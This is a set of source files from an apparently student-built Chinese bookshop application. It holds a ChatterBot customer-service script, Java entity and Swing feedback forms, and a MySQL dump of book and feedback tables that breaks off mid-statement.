"path": "/charrobot/DEMO01/CS1/test02.py",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "from chatterbot import ChatBot\nfrom chatterbot.trainers import ChatterBotCorpusTrainer\nfrom chatterbot.trainers import Trainer\n\nfrom chatterbot.trainers import ListTrainer\nchatbot = ChatBot(\"ChineseChatBot\")\ndef train(chatbot):\n trainer = ListTrainer(chatbot)\n trainer.train([\"快递\", \"默认顺非快递哦亲\"])\n trainer.train([\"发什么快递\", \"默认顺非快递哦亲\"])\n trainer.train([\"发货时间\", \"默认付款后24小时内发货哦亲\"])\n trainer.train([\"发货\", \"默认付款后24小时内发货哦亲\"])\n trainer.train([\"什么时候发货\",\"默认付款后24小时内发货哦亲\"])\n with open(r\"../data/xiaohuangji50w_nofenci.conv\", \"r\", encoding=\"utf-8\", errors=\"ignore\") as f:\n lists=[]\n line=f.readlines(50000)\n for i in line:\n if i.strip(\"E\").strip(\"M\").strip()!=\"\":\n lists.append(i.strip(\"E\").strip(\"M\").strip(\"\\n\"))\n\n else:\n trainer.train(lists)\n lists=[]\n\n\n# 开始对话\ndef res(chatbot,content):\n trainer = ListTrainer(chatbot)\n trainer.train([\"推荐\", \"人性的弱点,围城,活着\"])\n trainer.train([\"好书推荐\", \"人性的弱点,围城,活着\"])\n trainer.train([\"推荐基本书\", \"人性的弱点,围城,活着\"])\n trainer.train([\"好书\", \"人性的弱点,围城,活着\"])\n return str(chatbot.get_response(content))\n\n# train(chatbot)\n"
},
{
"alpha_fraction": 0.5231184363365173,
"alphanum_fraction": 0.5231184363365173,
"avg_line_length": 20.948148727416992,
"blob_id": "fe4454ee4d9867dc3bedaa6ca16a3c5105610399",
"content_id": "45a59ba6c436724f5abcd58672aa7d59b2064819",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 2963,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 135,
"path": "/src/com/bookshop/entity/User.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "package com.bookshop.entity;\n\npublic class User {\n private Integer id;\n private String loginName;\n private String password;\n private String name;\n private String sex;\n private String email;\n private String tel;\n private Integer level;\n private String address;\n\n public String getAddress() {\n return address;\n }\n\n public void setAddress(String address) {\n this.address = address;\n }\n\n public Integer getId() {\n return id;\n }\n\n public void setId(Integer id) {\n this.id = id;\n }\n\n public String getLoginName() {\n return loginName;\n }\n\n public void setLoginName(String loginName) {\n this.loginName = loginName;\n }\n\n public String getPassword() {\n return password;\n }\n\n public void setPassword(String password) {\n this.password = password;\n }\n\n public String getName() {\n return name;\n }\n\n public void setName(String name) {\n this.name = name;\n }\n\n public String getSex() {\n return sex;\n }\n\n public void setSex(String sex) {\n this.sex = sex;\n }\n\n public String getEmail() {\n return email;\n }\n\n public void setEmail(String email) {\n this.email = email;\n }\n\n public String getTel() {\n return tel;\n }\n\n public void setTel(String tel) {\n this.tel = tel;\n }\n\n public Integer getLevel() {\n return level;\n }\n\n public void setLevel(Integer level) {\n this.level = level;\n }\n\n public User() {\n super();\n }\n\n public User(String loginName, String password) {\n super();\n this.loginName = loginName;\n this.password = password;\n }\n\n public User(int id,String loginName, String password, String name, String sex, String email, String tel,String address,int level) {\n super();\n this.id=id;\n this.loginName = loginName;\n this.password = password;\n this.name = name;\n this.sex = sex;\n this.email = email;\n this.tel = tel;\n this.address=address;\n this.level=level;\n }\n public User(String loginName, String password, String name, String sex, String email, String tel,String address) {\n super();\n\n this.loginName = loginName;\n this.password = password;\n this.name = name;\n this.sex = sex;\n this.email = email;\n this.tel = tel;\n this.address=address;\n\n }\n\n @Override\n public String toString() {\n return \"User{\" +\n \"id=\" + id +\n \", loginName='\" + loginName + '\\'' +\n \", password='\" + password + '\\'' +\n \", name='\" + name + '\\'' +\n \", sex='\" + sex + '\\'' +\n \", email='\" + email + '\\'' +\n \", tel='\" + tel + '\\'' +\n \", level=\" + level +\n \", address='\" + address + '\\'' +\n '}';\n }\n}\n"
},
{
"alpha_fraction": 0.5883436799049377,
"alphanum_fraction": 0.617599606513977,
"avg_line_length": 34.876033782958984,
"blob_id": "998791bad625b1a2f0713e032614e752d9b335c6",
"content_id": "9244a39b6c170c4aafb661f2b38334798ff30672",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 4455,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 121,
"path": "/src/com/bookshop/ui/userForm/IdeaFrom.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "/*\n * Created by JFormDesigner on Thu Jul 02 13:23:02 CST 2020\n */\n\npackage com.bookshop.ui.userForm;\n\nimport com.bookshop.dao.impl.UserDaoImpl;\nimport com.bookshop.entity.Ideas;\nimport com.bookshop.service.impl.IdeaServiceImpl;\nimport com.bookshop.service.impl.UserServiceImpl;\nimport com.bookshop.util.UserData;\n\nimport java.awt.*;\nimport java.awt.event.*;\nimport java.sql.Date;\nimport javax.swing.*;\n\n/**\n * @author °Ëµã°ë\n */\npublic class IdeaFrom extends JFrame {\n public static void main(String[] args) {\n IdeaFrom ideaFrom = new IdeaFrom();\n ideaFrom.setVisible(true);\n }\n public IdeaFrom() {\n initComponents();\n }\n\n private void button1ActionPerformed(ActionEvent e) {\n // TODO add your code here\n// 意见发送\n //标题\n String title =textField2.getText().trim();\n //正文\n String text = textField1.getText().trim();\n if (\"\".equals(title)||\"\".equals(text)){\n JOptionPane.showMessageDialog(null, \"提示:标题和正文都不能为空\");\n }else {\n //创建 IdeaServiceImpl对象\n IdeaServiceImpl ideaService = new IdeaServiceImpl();\n String time = new Date(System.currentTimeMillis()).toString();\n //根据id获取用户名\n String loginName = new UserServiceImpl().queryById(UserData.userId).getLoginName();\n //创建idea对象\n Ideas ideas = new Ideas(title, text, time, loginName);\n// 插入意见\n if(ideaService.insert(ideas)>0){\n JOptionPane.showMessageDialog(null, \"提示:发送成功\");\n }else {\n JOptionPane.showMessageDialog(null, \"提示:发送失败\");\n }\n }\n\n }\n\n private void initComponents() {\n // JFormDesigner - Component initialization - DO NOT MODIFY //GEN-BEGIN:initComponents\n label1 = new JLabel();\n textField1 = new JTextField();\n button1 = new JButton();\n label3 = new JLabel();\n textField2 = new JTextField();\n label4 = new JLabel();\n\n //======== this ========\n Container contentPane = getContentPane();\n contentPane.setLayout(null);\n\n //---- label1 ----\n label1.setText(\"\\u610f\\u89c1\\u7559\\u8a00\");\n contentPane.add(label1);\n label1.setBounds(new Rectangle(new Point(95, 5), label1.getPreferredSize()));\n contentPane.add(textField1);\n textField1.setBounds(50, 115, 185, 265);\n\n //---- button1 ----\n button1.setText(\"\\u53d1\\u9001\");\n button1.addActionListener(e -> button1ActionPerformed(e));\n contentPane.add(button1);\n button1.setBounds(new Rectangle(new Point(95, 395), button1.getPreferredSize()));\n\n //---- label3 ----\n label3.setText(\"\\u6807\\u9898\");\n contentPane.add(label3);\n label3.setBounds(15, 50, 50, label3.getPreferredSize().height);\n contentPane.add(textField2);\n textField2.setBounds(45, 45, 180, textField2.getPreferredSize().height);\n\n //---- label4 ----\n label4.setText(\"\\u6b63\\u6587\");\n contentPane.add(label4);\n label4.setBounds(new Rectangle(new Point(15, 90), label4.getPreferredSize()));\n\n { // compute preferred size\n Dimension preferredSize = new Dimension();\n for(int i = 0; i < contentPane.getComponentCount(); i++) {\n Rectangle bounds = contentPane.getComponent(i).getBounds();\n preferredSize.width = Math.max(bounds.x + bounds.width, preferredSize.width);\n preferredSize.height = Math.max(bounds.y + bounds.height, preferredSize.height);\n }\n Insets insets = contentPane.getInsets();\n preferredSize.width += insets.right;\n preferredSize.height += insets.bottom;\n contentPane.setMinimumSize(preferredSize);\n contentPane.setPreferredSize(preferredSize);\n }\n pack();\n setLocationRelativeTo(getOwner());\n // JFormDesigner - End of component initialization //GEN-END:initComponents\n }\n\n // JFormDesigner - Variables declaration - DO NOT MODIFY //GEN-BEGIN:variables\n private JLabel label1;\n private JTextField textField1;\n private JButton button1;\n private JLabel label3;\n private JTextField textField2;\n private JLabel label4;\n // JFormDesigner - End of variables declaration //GEN-END:variables\n}\n"
},
{
"alpha_fraction": 0.6709265112876892,
"alphanum_fraction": 0.6709265112876892,
"avg_line_length": 14.649999618530273,
"blob_id": "201efdfe7b8be970d8f483cba869b04bfcace216",
"content_id": "305c65d3912032c5c509098dfad5b83d2a795993",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 313,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 20,
"path": "/src/com/bookshop/dao/BookTypeDao.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "package com.bookshop.dao;\n\nimport java.util.List;\n\nimport com.bookshop.entity.BookType;\n\npublic interface BookTypeDao {\n\n // insert\n int insert(BookType bookType);\n\n // delete\n int delete(Integer id);\n\n // update\n int update(BookType bookType);\n\n // queryAll\n List<BookType> queryAll();\n}\n"
},
{
"alpha_fraction": 0.5098751187324524,
"alphanum_fraction": 0.5455164313316345,
"avg_line_length": 30.241134643554688,
"blob_id": "0a60310890ee6329217f2bd6f4554a749ffdf944",
"content_id": "4738d1aeec538bbeea1f644536a989d488888277",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 4539,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 141,
"path": "/src/com/bookshop/ui/AdminForm/AdnimIdeaForm.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "/*\n * Created by JFormDesigner on Mon Jul 06 10:29:32 CST 2020\n */\n\npackage com.bookshop.ui.AdminForm;\n\nimport com.bookshop.entity.Book;\nimport com.bookshop.entity.Ideas;\nimport com.bookshop.service.impl.IdeaServiceImpl;\n\nimport java.awt.*;\nimport java.awt.event.*;\nimport java.util.List;\nimport javax.swing.*;\nimport javax.swing.table.*;\n\n/**\n * @author °Ëµã°ë\n */\npublic class AdnimIdeaForm extends JFrame {\n public static void main(String[] args) {\n AdnimIdeaForm adnimIdeaForm = new AdnimIdeaForm();\n adnimIdeaForm.setVisible(true);\n }\n IdeaServiceImpl ideaService = new IdeaServiceImpl();\n public AdnimIdeaForm() {\n initComponents();\n }\n\n public String[][] select() {\n List<Ideas> ideas;\n\n\n ideas = ideaService.queryAll();\n\n String[][] datas = new String[ideas.size()][5];\n for (int i = 0; i < ideas.size(); i++) {\n datas[i][0] = ideas.get(i).getId().toString();\n datas[i][1] = ideas.get(i).getTitle();\n datas[i][2] = ideas.get(i).getContent();\n datas[i][3] = ideas.get(i).getSender();\n datas[i][4] = ideas.get(i).getSendTime();\n\n\n\n }\n return datas;\n\n }\n\n public void showData() {\n\n\n //---- table1 ----\n table1.setModel(new DefaultTableModel(\n select(),\n new String[]{\n \"\\u6807\\u9898\", \"\\u6b63\\u6587\", \"\\u53d1\\u9001\\u8005\", \"\\u53d1\\u9001\\u65f6\\u95f4\"\n }\n ));\n scrollPane1.setViewportView(table1);\n\n }\n private void button1ActionPerformed(ActionEvent e) {\n // TODO add your code here\n// 删除意见\n int[] selectedRows = table1.getSelectedRows();\n if (selectedRows.length > 0) {\n for (int index = 0; index < selectedRows.length; index++) {\n // 取得表格对象的数据模型\n TableModel model = table1.getModel();\n // 在表格对象模型中,根据选中的行和列,获取相应的数据值\n int id = Integer.parseInt(model.getValueAt(selectedRows[index], 0).toString());\n ideaService.delete(id);\n\n }\n JOptionPane.showMessageDialog(null, \"提示:删除成功!\");\n }else {\n JOptionPane.showMessageDialog(null, \"提示:删除失败!\");\n JOptionPane.showMessageDialog(null, \"提示:请选择ID!\");\n }\n\n showData();\n\n }\n\n private void initComponents() {\n // JFormDesigner - Component initialization - DO NOT MODIFY //GEN-BEGIN:initComponents\n scrollPane1 = new JScrollPane();\n table1 = new JTable();\n button1 = new JButton();\n\n //======== this ========\n Container contentPane = getContentPane();\n contentPane.setLayout(null);\n\n //======== scrollPane1 ========\n {\n\n //---- table1 ----\n table1.setModel(new DefaultTableModel(\n new Object[][] {\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null},\n },\n new String[] {\n \"\\u6807\\u9898\", \"\\u6b63\\u6587\", \"\\u53d1\\u9001\\u8005\", \"\\u53d1\\u9001\\u65f6\\u95f4\"\n }\n ));\n scrollPane1.setViewportView(table1);\n }\n showData();\n contentPane.add(scrollPane1);\n scrollPane1.setBounds(20, 15, 725, 330);\n\n //---- button1 ----\n button1.setText(\"\\u5220\\u9664\");\n button1.addActionListener(e -> button1ActionPerformed(e));\n contentPane.add(button1);\n button1.setBounds(new Rectangle(new Point(325, 365), button1.getPreferredSize()));\n\n contentPane.setPreferredSize(new Dimension(765, 490));\n pack();\n setLocationRelativeTo(getOwner());\n // JFormDesigner - End of component initialization //GEN-END:initComponents\n }\n\n // JFormDesigner - Variables declaration - DO NOT MODIFY //GEN-BEGIN:variables\n private JScrollPane scrollPane1;\n private JTable table1;\n private JButton button1;\n // JFormDesigner - End of variables declaration //GEN-END:variables\n}\n"
},
{
"alpha_fraction": 0.4761575758457184,
"alphanum_fraction": 0.5951836705207825,
"avg_line_length": 59.87702178955078,
"blob_id": "0ced1c883782f2865f171e10ccec994d5e36ebf2",
"content_id": "7bd93c82c565ff31705dc4407be725359a4e3f17",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 24327,
"license_type": "no_license",
"max_line_length": 234,
"num_lines": 309,
"path": "/bookshop.sql",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "/*\nNavicat MySQL Data Transfer\n\nSource Server : localhost_3306\nSource Server Version : 50727\nSource Host : localhost:3306\nSource Database : bookshop\n\nTarget Server Type : MYSQL\nTarget Server Version : 50727\nFile Encoding : 65001\n\nDate: 2020-07-09 15:43:47\n*/\n\nSET FOREIGN_KEY_CHECKS=0;\n\n-- ----------------------------\n-- Table structure for `admin`\n-- ----------------------------\nDROP TABLE IF EXISTS `admin`;\nCREATE TABLE `admin` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `name` varchar(100) NOT NULL,\n `password` varchar(100) NOT NULL,\n `create_time` date DEFAULT NULL,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of admin\n-- ----------------------------\nINSERT INTO `admin` VALUES ('1', 'hua', '666666', '2020-06-10');\n\n-- ----------------------------\n-- Table structure for `book`\n-- ----------------------------\nDROP TABLE IF EXISTS `book`;\nCREATE TABLE `book` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `name` varchar(100) NOT NULL,\n `author` varchar(100) DEFAULT NULL,\n `publisher` varchar(100) DEFAULT NULL,\n `price` double(100,3) DEFAULT NULL,\n `type_id` int(11) DEFAULT NULL,\n `disc` varchar(100) DEFAULT '无',\n `discount` double(11,2) DEFAULT '1.00',\n `store` int(11) DEFAULT NULL,\n `flag` int(11) DEFAULT NULL,\n `create_time` varchar(100) DEFAULT '',\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB AUTO_INCREMENT=31 DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of book\n-- ----------------------------\nINSERT INTO `book` VALUES ('21', 'java', '远华', '远华出版社 ', '10.000', '2', '无', '1.00', '78', '1', '2020-07-04');\nINSERT INTO `book` VALUES ('23', '人月神话', '云华', '远华出版社 ', '100.000', '2', '无', '0.50', '80', '1', '2020-07-04');\nINSERT INTO `book` VALUES ('26', '人性的弱点', '华哥', '圆滑出版社 ', '50.000', '1', '无', '1.00', '99', '1', '2020-07-05');\nINSERT INTO `book` VALUES ('29', '围城', '我', '远华出版社 ', '20.000', '1', '有', '0.90', '16', '1', '2020-07-06');\nINSERT INTO `book` VALUES ('30', '活着', '你', '国家出版社 ', '30.000', '1', '无', '1.00', '30', '1', '2020-07-08');\n\n-- ----------------------------\n-- Table structure for `booklist`\n-- ----------------------------\nDROP TABLE IF EXISTS `booklist`;\nCREATE TABLE `booklist` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `name` varchar(255) DEFAULT NULL,\n `link` varchar(255) DEFAULT NULL,\n `publicer` varchar(255) DEFAULT NULL,\n `grade` varchar(255) DEFAULT NULL,\n `num` varchar(255) DEFAULT NULL,\n `content` text,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB AUTO_INCREMENT=73 DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of booklist\n-- ----------------------------\nINSERT INTO `booklist` VALUES ('41', '围城', 'https://book.douban.com/subject/1008145/', '钱锺书 / 人民文学出版社 / 1991-2 / 19.00', '8.9', '(373035人评价)', '书所著的长篇小说。第一版于1947年由上海晨光出版公司出版。1949年之后,由于政治等方面的原因,本书长期无法在中国大陆和台湾重印,仅在香港出...');\nINSERT INTO `booklist` VALUES ('42', '围城', 'https://book.douban.com/subject/11524204/', '钱钟书 / 人民文学出版社 / 1991-2-1 / 39.00元', '9.3', '(52105人评价)', '栩栩如生的世井百态图,人生的酸甜苦辣千般滋味均在其中得到了淋漓尽致的体现。钱钟书先生将自己的语言天才并入极其渊博的知识,再添加上一些讽刺主义的...');\nINSERT INTO `booklist` VALUES ('43', '围城', 'https://book.douban.com/subject/1069848/', '钱钟书 / 生活·读书·新知三联书店 / 2002-5 / 18.60元', '9.0', '(27902人评价)', '姻是围城,冲进去了,就被生存的种种烦愁包围。《围城》是钱钟书撰写的一部“新《儒林外史》”。钱钟书以他洒脱幽默的文笔,描写了一群知识分子的生活百...');\nINSERT INTO `booklist` VALUES ('44', '围城', 'https://book.douban.com/subject/1855364/', '钱锺书 / 人民文学出版社 / 2007-8 / 19.00元', '9.2', '(23992人评价)', '书所著的长篇小说。第一版于1947年由上海晨光出版公司出版。1949年之后,由于政治等方面的原因,本书长期无法在中国大陆和台湾重印,仅在香港出...');\nINSERT INTO `booklist` VALUES ('45', '围城', 'https://book.douban.com/subject/24745649/', '钱钟书 / 人民文学出版社 / 2013-6 / 28.00', '9.2', '(11914人评价)', '来横贯常销畅销小说之首。《围城》是钱钟书唯一的一部长篇小说,堪称中国现当代长篇小说的经典。小说塑造了抗战开初一类知识分子的群像,生动反映了在国...');\nINSERT INTO `booklist` VALUES ('46', '围城', 'https://book.douban.com/subject/1464989/', '钱钟书 / 人民文学出版社 / 1985 / 1.70元', '9.1', '(7465人评价)', '书所著的长篇小说。第一版于1947年由上海晨光出版公司出版。1949年之后,由于政治等方面的原因,本书长期无法在中国大陆和台湾重印,仅在香港出...');\nINSERT INTO `booklist` VALUES ('47', '《围城》汇校本', 'https://book.douban.com/subject/3011470/', '錢鍾書、胥智芬滙校 / 四川文藝岀版社 / 1992 / 6.20元', '9.1', '(162人评价)', '那些吃饭斗嘴、争风吃醋,调侃意味是最浓了;而当我们看到三闾大学,辛辣的讽刺味则突出些;小说后半,方鸿渐回到上海,往日的朋友或冤家都已星散,他的...');\nINSERT INTO `booklist` VALUES ('48', '围城', 'https://book.douban.com/subject/1039427/', '钱钟书 / 人民文学出版社 / 2001-01 / 15.20', '9.0', '(4629人评价)', '长篇小说《围城》和短篇小说集《人·兽·鬼》合为一书出版。');\nINSERT INTO `booklist` VALUES ('49', '围城 / 人·兽·鬼', 'https://book.douban.com/subject/4054726/', '钱锺书 / 生活·读书·新知三联书店 / 2009-11 / 29.50元', '9.3', '(1104人评价)', '七年在上海初版,一九四八年再版,一九四九年三版,以后国内没有重印过。偶然碰见它的新版,那都是香港的“盗印”本。没有看到台湾的“盗印”本,据说在...');\nINSERT INTO `booklist` VALUES ('50', '围城', 'https://book.douban.com/subject/3523063/', '钱钟书 / 人民文学出版社 / 1991-2 / 20.00元', '9.1', '(1516人评价)', '书仅有的一部长篇小说,堪称中国现当代长篇小说的经典。小说塑造了抗战开初一类知识分子的群像,生动反映了在国家特定时期,特殊人群的行为操守、以及困...');\nINSERT INTO `booklist` VALUES ('51', '围城', 'https://book.douban.com/subject/27070488/', '钱锺书 / 人民文学出版社 / 2017-6 / 36.00', '9.3', '(4473人评价)', '姻是围城,冲进去了,就被生存的种种烦愁包围。《围城》是钱钟书撰写的一部“新《儒林外史》”。钱钟书以他洒脱幽默的文笔,描写了一群知识分子的生活百...');\nINSERT INTO `booklist` VALUES ('52', '围城', 'https://book.douban.com/subject/1468602/', '钱钟书 / 人民文学出版社 / 2000-7 / 16.00元', '9.2', '(3718人评价)', '读丛书中的一册,书中以教育部全国高等学校中文学科教学指导委员会指定书目为依据,收录了当代著名作家钱钟书先生的长篇小说《围城》。\\n 本书具...');\nINSERT INTO `booklist` VALUES ('53', 'Qian Zhongshu', 'https://book.douban.com/subject/1712544/', '北京科海电子出版社 / 1991 / 16', '8.7', '(少于10人评价)', '国“个体家庭”的选择》是《个体家庭iFamily:当代中国城市现代化进程中的个体、家庭和国家》的再版。中国在现代化进程中,家庭主义逐步被个体化...');\nINSERT INTO `booklist` VALUES ('54', '围城', 'https://book.douban.com/subject/1011250/', '钱钟书 / 人民文学出版社 / 2003-01 / 16.80', '8.7', '(406人评价)', '编外》是一部80后作家所写的职场小说。小说记述了一个大学毕业生进入一个行政事业单位之后的种种经历,以细腻、生动和不乏黑色幽默的笔触揭示了“单位...');\nINSERT INTO `booklist` VALUES ('55', '谁在你家', 'https://book.douban.com/subject/34446478/', '沈奕斐 / 上海三联书店 / 2019-6 / 68元', '9.1', '(57人评价)', '的法国邮船白拉日隆子爵号在上海靠了岸。小说的主人公方鸿渐一踏上阔别四年的故土,就接二连三地陷入了“围城”。\\n方鸿渐旅欧回国,正是一九三七年夏天...');\nINSERT INTO `booklist` VALUES ('56', '编外', 'https://book.douban.com/subject/21612247/', '史啸思 / 天津人民出版社 / 2013-3 / 28.80元', '9.2', '(少于10人评价)', '版)显示给我们一个真正的聪明人是怎样看人生,又怎样用所有作家都必得使用的文字来表述自己的“观”和“感”的。小说原来也是可以这样写的,小说家的高...');\nINSERT INTO `booklist` VALUES ('57', '围城', 'https://book.douban.com/subject/1008145/', '钱锺书 / 人民文学出版社 / 1991-2 / 19.00', '8.9', '(373035人评价)', '书所著的长篇小说。第一版于1947年由上海晨光出版公司出版。1949年之后,由于政治等方面的原因,本书长期无法在中国大陆和台湾重印,仅在香港出...');\nINSERT INTO `booklist` VALUES ('58', '围城', 'https://book.douban.com/subject/11524204/', '钱钟书 / 人民文学出版社 / 1991-2-1 / 39.00元', '9.3', '(52105人评价)', '栩栩如生的世井百态图,人生的酸甜苦辣千般滋味均在其中得到了淋漓尽致的体现。钱钟书先生将自己的语言天才并入极其渊博的知识,再添加上一些讽刺主义的...');\nINSERT INTO `booklist` VALUES ('59', '围城', 'https://book.douban.com/subject/1069848/', '钱钟书 / 生活·读书·新知三联书店 / 2002-5 / 18.60元', '9.0', '(27902人评价)', '姻是围城,冲进去了,就被生存的种种烦愁包围。《围城》是钱钟书撰写的一部“新《儒林外史》”。钱钟书以他洒脱幽默的文笔,描写了一群知识分子的生活百...');\nINSERT INTO `booklist` VALUES ('60', '围城', 'https://book.douban.com/subject/1855364/', '钱锺书 / 人民文学出版社 / 2007-8 / 19.00元', '9.2', '(23992人评价)', '书所著的长篇小说。第一版于1947年由上海晨光出版公司出版。1949年之后,由于政治等方面的原因,本书长期无法在中国大陆和台湾重印,仅在香港出...');\nINSERT INTO `booklist` VALUES ('61', '围城', 'https://book.douban.com/subject/24745649/', '钱钟书 / 人民文学出版社 / 2013-6 / 28.00', '9.2', '(11914人评价)', '来横贯常销畅销小说之首。《围城》是钱钟书唯一的一部长篇小说,堪称中国现当代长篇小说的经典。小说塑造了抗战开初一类知识分子的群像,生动反映了在国...');\nINSERT INTO `booklist` VALUES ('62', '围城', 'https://book.douban.com/subject/1464989/', '钱钟书 / 人民文学出版社 / 1985 / 1.70元', '9.1', '(7465人评价)', '书所著的长篇小说。第一版于1947年由上海晨光出版公司出版。1949年之后,由于政治等方面的原因,本书长期无法在中国大陆和台湾重印,仅在香港出...');\nINSERT INTO `booklist` VALUES ('63', '《围城》汇校本', 'https://book.douban.com/subject/3011470/', '錢鍾書、胥智芬滙校 / 四川文藝岀版社 / 1992 / 6.20元', '9.1', '(162人评价)', '那些吃饭斗嘴、争风吃醋,调侃意味是最浓了;而当我们看到三闾大学,辛辣的讽刺味则突出些;小说后半,方鸿渐回到上海,往日的朋友或冤家都已星散,他的...');\nINSERT INTO `booklist` VALUES ('64', '围城', 'https://book.douban.com/subject/1039427/', '钱钟书 / 人民文学出版社 / 2001-01 / 15.20', '9.0', '(4629人评价)', '长篇小说《围城》和短篇小说集《人·兽·鬼》合为一书出版。');\nINSERT INTO `booklist` VALUES ('65', '围城 / 人·兽·鬼', 'https://book.douban.com/subject/4054726/', '钱锺书 / 生活·读书·新知三联书店 / 2009-11 / 29.50元', '9.3', '(1104人评价)', '七年在上海初版,一九四八年再版,一九四九年三版,以后国内没有重印过。偶然碰见它的新版,那都是香港的“盗印”本。没有看到台湾的“盗印”本,据说在...');\nINSERT INTO `booklist` VALUES ('66', '围城', 'https://book.douban.com/subject/3523063/', '钱钟书 / 人民文学出版社 / 1991-2 / 20.00元', '9.1', '(1516人评价)', '书仅有的一部长篇小说,堪称中国现当代长篇小说的经典。小说塑造了抗战开初一类知识分子的群像,生动反映了在国家特定时期,特殊人群的行为操守、以及困...');\nINSERT INTO `booklist` VALUES ('67', '围城', 'https://book.douban.com/subject/27070488/', '钱锺书 / 人民文学出版社 / 2017-6 / 36.00', '9.3', '(4473人评价)', '姻是围城,冲进去了,就被生存的种种烦愁包围。《围城》是钱钟书撰写的一部“新《儒林外史》”。钱钟书以他洒脱幽默的文笔,描写了一群知识分子的生活百...');\nINSERT INTO `booklist` VALUES ('68', '围城', 'https://book.douban.com/subject/1468602/', '钱钟书 / 人民文学出版社 / 2000-7 / 16.00元', '9.2', '(3718人评价)', '读丛书中的一册,书中以教育部全国高等学校中文学科教学指导委员会指定书目为依据,收录了当代著名作家钱钟书先生的长篇小说《围城》。\\n 本书具...');\nINSERT INTO `booklist` VALUES ('69', 'Qian Zhongshu', 'https://book.douban.com/subject/1712544/', '北京科海电子出版社 / 1991 / 16', '8.7', '(少于10人评价)', '国“个体家庭”的选择》是《个体家庭iFamily:当代中国城市现代化进程中的个体、家庭和国家》的再版。中国在现代化进程中,家庭主义逐步被个体化...');\nINSERT INTO `booklist` VALUES ('70', '围城', 'https://book.douban.com/subject/1011250/', '钱钟书 / 人民文学出版社 / 2003-01 / 16.80', '8.7', '(406人评价)', '编外》是一部80后作家所写的职场小说。小说记述了一个大学毕业生进入一个行政事业单位之后的种种经历,以细腻、生动和不乏黑色幽默的笔触揭示了“单位...');\nINSERT INTO `booklist` VALUES ('71', '谁在你家', 'https://book.douban.com/subject/34446478/', '沈奕斐 / 上海三联书店 / 2019-6 / 68元', '9.1', '(57人评价)', '的法国邮船白拉日隆子爵号在上海靠了岸。小说的主人公方鸿渐一踏上阔别四年的故土,就接二连三地陷入了“围城”。\\n方鸿渐旅欧回国,正是一九三七年夏天...');\nINSERT INTO `booklist` VALUES ('72', '编外', 'https://book.douban.com/subject/21612247/', '史啸思 / 天津人民出版社 / 2013-3 / 28.80元', '9.2', '(少于10人评价)', '版)显示给我们一个真正的聪明人是怎样看人生,又怎样用所有作家都必得使用的文字来表述自己的“观”和“感”的。小说原来也是可以这样写的,小说家的高...');\n\n-- ----------------------------\n-- Table structure for `book_type`\n-- ----------------------------\nDROP TABLE IF EXISTS `book_type`;\nCREATE TABLE `book_type` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `type` varchar(100) NOT NULL,\n `create_time` date DEFAULT NULL,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of book_type\n-- ----------------------------\nINSERT INTO `book_type` VALUES ('3', '计算机', '2020-07-06');\nINSERT INTO `book_type` VALUES ('4', '历史', '2020-07-08');\n\n-- ----------------------------\n-- Table structure for `cart`\n-- ----------------------------\nDROP TABLE IF EXISTS `cart`;\nCREATE TABLE `cart` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `user_id` int(11) NOT NULL,\n `book_id` int(11) NOT NULL,\n `book_num` int(11) DEFAULT NULL,\n `book_price` double(11,2) DEFAULT NULL,\n `book_name` varchar(100) DEFAULT NULL,\n `create_time` date DEFAULT NULL,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB AUTO_INCREMENT=60 DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of cart\n-- ----------------------------\n\n-- ----------------------------\n-- Table structure for `idea`\n-- ----------------------------\nDROP TABLE IF EXISTS `idea`;\nCREATE TABLE `idea` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `title` varchar(100) NOT NULL,\n `content` text,\n `send_time` varchar(100) DEFAULT NULL,\n `sender` varchar(100) DEFAULT NULL,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8;\n\n-- ----------------------------\n-- Records of idea\n-- ----------------------------\nINSERT INTO `idea` VALUES ('5', '好评', '书本太好了,很满意的服务', '2020-07-06', 'hua');\nINSERT INTO `idea` VALUES ('7', '范围分为', '访问违法未', '2020-07-07', 'hua');\n\n-- ----------------------------\n-- Table structure for `order`\n-- ----------------------------\nDROP TABLE IF EXISTS `order`;\nCREATE TABLE `order` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `order_item_id` int(11) NOT NULL DEFAULT '0',\n `user_id` int(11) NOT NULL,\n `priceSum` double(11,2) NOT 